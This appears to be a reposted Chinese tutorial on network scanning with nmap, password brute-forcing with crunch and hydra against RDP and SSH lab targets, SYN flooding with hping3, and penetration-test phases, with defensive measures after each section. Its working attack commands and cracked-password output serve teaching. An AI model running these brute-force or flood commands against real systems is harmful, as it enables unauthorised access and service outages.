信息收集
1、掃描的價(jià)值
對(duì)攻擊者來說:根據(jù)掃描結(jié)果,來決定進(jìn)一步的攻擊行動(dòng);
能夠更有針對(duì)性地選擇攻擊方法、攻擊工具,節(jié)省攻擊時(shí)間
對(duì)防護(hù)者來說:根據(jù)掃描結(jié)果,判斷應(yīng)采取什么樣的安全策略;
封堵漏洞、加固系統(tǒng)、完善訪問控制
2、nmap
Network Mapper,一款開源的網(wǎng)絡(luò)探測(cè)器
-采用原始報(bào)文方式,可以快速掃描單個(gè)主機(jī)或大型網(wǎng)絡(luò)
-識(shí)別目標(biāo)的服務(wù)類型、程序版本、防火墻等
1)nmap 命令格式
nmap ?[掃描類型] ?[選項(xiàng)] ?<掃描目標(biāo)>
2)指定掃描類型
? -sS:TCP半開掃描(只發(fā)SYN包,不會(huì)產(chǎn)生會(huì)話日志),速度快
? -sT:TCP全開掃描(嘗試全連接),結(jié)果更準(zhǔn)確
? -sU:UDP掃描
? -sP:使用ICMP掃描,僅用于探測(cè)目標(biāo)是否在線
? -O ?掃描操作系統(tǒng)
? -sV 掃描端口對(duì)應(yīng)的服務(wù)版本
3)指定目標(biāo)端口
? -p ?3389 ?:掃描指定接口
? -p ?20-80 :掃描連續(xù)的接口
? -p ?22,80 :掃描多個(gè)指定接口
4)端口狀態(tài)
? open ?: 開放的
? filtered ?:探測(cè)報(bào)文被目標(biāo)服務(wù)器的防火墻過濾和阻止了
? closed :關(guān)閉的
? 探測(cè)邏輯
1、探測(cè)存活的主機(jī):nmap -sP ?192.168.10.0/24; nmap -sS ?192.168.10.0/24
2、探測(cè)目標(biāo)主機(jī)的端口號(hào):nmap -sS -p 端口列表 主機(jī)列表
3、探測(cè)目標(biāo)主機(jī)端口對(duì)應(yīng)的軟件信息:nmap -sV -p 端口 ?主機(jī)
4、探測(cè)目標(biāo)主機(jī)操作系統(tǒng)信息:nmap -O 主機(jī)
5、進(jìn)一步攻擊:密碼爆破、漏洞利用、拒絕服務(wù)攻擊
密碼暴力破解
1、什么是暴力破解
? ? 密碼破解指攻擊者猜解目標(biāo)密碼或用戶名的攻擊行為
暴力破解,也稱為“密碼窮舉”,列出各種可能的密碼,用來嘗試去訪問目標(biāo)系統(tǒng),理論上任何密碼都可以用這種方法來破解,不過越復(fù)雜的密碼破解耗時(shí)也越長(zhǎng)
字典破解,實(shí)施破解時(shí)采用“可能”的密碼,比如生日、單詞、常用數(shù)字,可手動(dòng)或通過工具編寫,也可以通過分享獲取社工密碼庫(kù)(最常見的密碼是“password”、“123456”、“123456789”)
? ? [全球最常用的密碼名單公布:“password”“123456”前二 (baidu.com)]
? ? 測(cè)試密碼有多安全?
[https://www.security.org/how-secure-is-my-password/]
(https://www.security.org/how-secure-is-my-password/)
?
2、crunch密碼字典工具
基本用法:crunch ? ? 最小長(zhǎng)度 ? ? 最大長(zhǎng)度 ? ?素材字符
示例1:crunch ?6 ? 6 ? 0123456789 ? ?//隨機(jī)組成6位純數(shù)字密碼
示例2:crunch ?6 ? 8 ? ?Abc1234 ? ?//由Abc1234隨機(jī)組成的6~8位密碼
示例3:crunch ?8 ? 8 ? -t ?A%% ? ? -o ?pass.txt ?// 以A開頭2位數(shù)字組成的3位密碼,保存為pass.txt文件
?
? 特殊匹配字符:
@ ? --> 代表小寫字母
,? ? ?--> 代表大寫字母
%? ?--> 代表數(shù)字
^? ? ?--> 代表標(biāo)點(diǎn)及特殊字符
? 十八年窖藏的密碼字典
[https://wwi.lanzoup.com/ivqUz0phft5c](https://wwi.lanzoup.com/ivqUz0phft5c)
3、hydra暴力破解
hydra:海德拉,一款功能強(qiáng)大的開源密碼攻擊工具,支持多種協(xié)議的破解
格式:hydra ?[選項(xiàng)] ? 目標(biāo)地址 ?服務(wù)類型
?-l 指定用戶名
?-L 指定用戶名字典文件
?-P 指定密碼字典文件
?-o 將結(jié)果輸出到指定文件
?-v 顯示破解過程
?-t 同時(shí)執(zhí)行的任務(wù)數(shù),默認(rèn)16個(gè)
示例1:破解windows靶機(jī)遠(yuǎn)程桌面密碼
第一步:生成密碼字典
┌──(root??kali)-[~]
└─# crunch ?7 ? 7 ? -t ?pwd%%%% ? -o ?p1.txt ? ?//產(chǎn)生開頭pwd后面4位數(shù)字的長(zhǎng)度7位密碼
第二步:執(zhí)行暴力破解(使用RDP-3389進(jìn)行爆破)
┌──(root??kali)-[~]
└─# hydra ?-l ?Administrator ?-P ?p1.txt ?192.168.10.145 ?rdp
[DATA] attacking rdp://192.168.10.145:3389/
[3389][rdp] host: 192.168.10.145 ? login: Administrator ? password: pwd1234
第三步:在kali系統(tǒng)中遠(yuǎn)程登錄windows-2008
┌──(root??kali)-[~]
└─# rdesktop ? 192.168.10.145
輸入: yes
示例2:破解Linux靶機(jī)SSH登錄密碼
第一步:編寫密碼字典
┌──(root??kali)-[~]
└─# vim ?pass.list
第二步:執(zhí)行暴力破解
┌──(root??kali)-[~]
└─# hydra ?-l ?msfadmin ?-P ?pass.list ?192.168.10.143 ?ssh ?-t 4 ? ? ?//同時(shí)4個(gè)任務(wù)
[22][ssh] host: 192.168.10.143 ?login: msfadmin ?password: msfadmin
?
? 爆破ssh密碼時(shí)可能因?qū)Ψ絊SH配置,需要限制破解任務(wù)數(shù)量 -t 4
? 第三步:在kali系統(tǒng)中,遠(yuǎn)程另外一臺(tái)kali 主機(jī)
? ┌──(root??kali)-[~]
? └─# ssh ? ?msfadmin@192.168.10.143
4、防暴破
1)設(shè)置黑客想不到的(防字典破解),設(shè)置夠長(zhǎng)夠復(fù)雜的(防暴力破解),定期修改密碼,不要用老密碼
2)禁用管理員賬號(hào)或改名,如:Administrator、root
3)做系統(tǒng)加固,設(shè)置登錄次數(shù)限制、啟用賬戶鎖定閾值(針對(duì)普通用戶)
4)修改端口號(hào)
5)指定哪些IP地址可以遠(yuǎn)程連接到本電腦
?
拒絕服務(wù)
1、什么是拒絕服務(wù):
? ? 通過各種手段,最終導(dǎo)致目標(biāo)系統(tǒng)崩潰、失去響應(yīng),從而使目標(biāo)系統(tǒng)不能為正常的用戶提供資源或?qū)?yīng)的功能(拒絕服務(wù))
? ? 常見的DoS攻擊方式:
? ? ? SYN Flood泛洪
? ? ? Ping Flood泛洪
? ? ? UDP Flood泛洪
2、hping3測(cè)試工具
? ? 可向目標(biāo)主機(jī)發(fā)送任意TCP/IP協(xié)議數(shù)據(jù)包的一款開源的安全工具,也用于掃描/防火墻測(cè)試/路由追蹤/協(xié)議分析等場(chǎng)景
? ? 格式: hping3 ?主機(jī) ?[選項(xiàng)]
? ? 常用選項(xiàng):
? ? ? --syn:設(shè)置SYN標(biāo)記(-S)
? ? ? -p:指定目標(biāo)端口
? ? ? -a:偽造源地址欺騙
? ? ? -d: ?指定數(shù)據(jù)包的大小
? ? ? --flood:泛洪,盡最快發(fā)送數(shù)據(jù)包,不顯示回復(fù)
? ? ? --rand-source:隨機(jī)源地址模式
3、DoS攻擊案例
? 測(cè)試機(jī):kali,使用hping3工具
? 靶機(jī):windows靶機(jī),開啟3389遠(yuǎn)程桌面服務(wù)
? 場(chǎng)景演示:針對(duì)靶機(jī)的3389端口發(fā)起攻擊,使其失去響應(yīng)
??
? 第一步:正常訪問Windows靶機(jī)遠(yuǎn)程桌面
? 第二步:kali 主機(jī)對(duì)windows靶機(jī)發(fā)起攻擊
? ┌──(root??kali)-[~]
? └─# hping3 ?192.168.10.145 --syn --flood -p 3389
? HPING 192.168.10.145 (eth0 192.168.10.145): S set, 40 headers + 0 data bytes
? hping in flood mode, no replies will be shown
? //需要停止時(shí),按Ctrl + C快捷鍵
??
? 第三步:驗(yàn)證:在攻擊過程中,遠(yuǎn)程windows-2008,發(fā)現(xiàn)無法連接遠(yuǎn)程
? 第四步:再次驗(yàn)證
? 備注:停止攻擊,稍等1分鐘,可以正常遠(yuǎn)程
??
4、DDoS,分布式拒絕服務(wù)( Distributed Denial of Service)
? 1)什么是分布式拒絕服務(wù):
? ? 一種典型的流量攻擊,放大版的DoS攻擊,攻擊方的主機(jī)數(shù)量呈現(xiàn)規(guī)?;?/p>
? ? 通常由分布在不同網(wǎng)絡(luò)、不同位置的成千上萬的主機(jī)組成攻擊方(通常稱為botnet僵尸網(wǎng)絡(luò)),被同一發(fā)起者所控制,攻擊強(qiáng)度更大,防御的難度也更大。
??
? 2)如何防御DoS/DDoS攻擊:
? ? 1)提高服務(wù)方的交付能力
? ? ? 減少服務(wù)配置的等待時(shí)間
? ? ? 優(yōu)化單一客戶機(jī)的并發(fā)響應(yīng)策略
? ? ? 更換高性能設(shè)備
? ? ? 增加網(wǎng)絡(luò)帶寬
? ? ? 負(fù)載均衡架構(gòu)
? ? ? 部署CDN內(nèi)容分發(fā)網(wǎng)絡(luò)
? ? 2)部署專用軟硬件防御產(chǎn)品
? ? ? 冰盾防火墻
? ? ? 流量清洗、 DDoS高防IP
? ? ? IDS入侵檢測(cè)設(shè)備
? ? ? 抗DDoS專用防火墻設(shè)備
? ? ? 識(shí)別源IP,植入黑名單
滲透測(cè)試流程
?1、滲透測(cè)試是什么
? -是一種通過模擬攻擊的技術(shù)與方法,打破目標(biāo)系統(tǒng)的安全防御,并獲得目標(biāo)系統(tǒng)控制訪問權(quán)的安全測(cè)試方法.
2、滲透測(cè)試的目標(biāo)分類
? -針對(duì)主機(jī)操作系統(tǒng)滲透:Windows、Linux···
? -針對(duì)數(shù)據(jù)庫(kù)系統(tǒng)滲透:MySQL、MS-SQL···
? -針對(duì)應(yīng)用系統(tǒng)滲透:PHP組成的網(wǎng)站···
? -針對(duì)網(wǎng)絡(luò)設(shè)備滲透:防火墻、路由器、交換機(jī)···
?3、滲透測(cè)試的7個(gè)階段
? ? 1)前期交互
? ? 2)信息收集
? ? 3)威脅建模
? ? 4)漏洞分析
? ? 5)滲透攻擊
? ? 6)后滲透攻擊文章來源:http://www.zghlxwxcb.cn/news/detail-474553.html
? ? 7)滲透報(bào)告文章來源地址http://www.zghlxwxcb.cn/news/detail-474553.html
到了這里,關(guān)于密碼暴力破解、滲透測(cè)試流程的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!